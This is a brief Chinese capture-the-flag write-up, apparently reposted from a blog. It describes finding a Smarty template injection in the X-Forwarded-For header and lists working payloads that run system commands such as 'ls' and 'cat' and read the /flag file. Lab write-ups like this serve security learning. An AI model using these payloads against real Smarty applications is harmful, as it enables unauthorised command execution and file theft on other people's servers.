标签:插入 info png img class code sys 文件中 存在
知识点
抓包,根据题目猜想X-Forwarded-For处可能有问题,测试了一下,存在模板注入
测试了一下,是smarty注入
smarty注入payload
{if phpinfo()}{/if} {if system(‘ls‘)}{/if} { readfile(‘/flag‘) } {if show_source(‘/flag‘)}{/if} {if system(‘cat ../../../flag‘)}{/if} #本题payload
flag.php是假的,真正的flag在根目录下的flag文件中
标签:插入 info png img class code sys 文件中 存在
原文地址:https://www.cnblogs.com/mech/p/12892088.html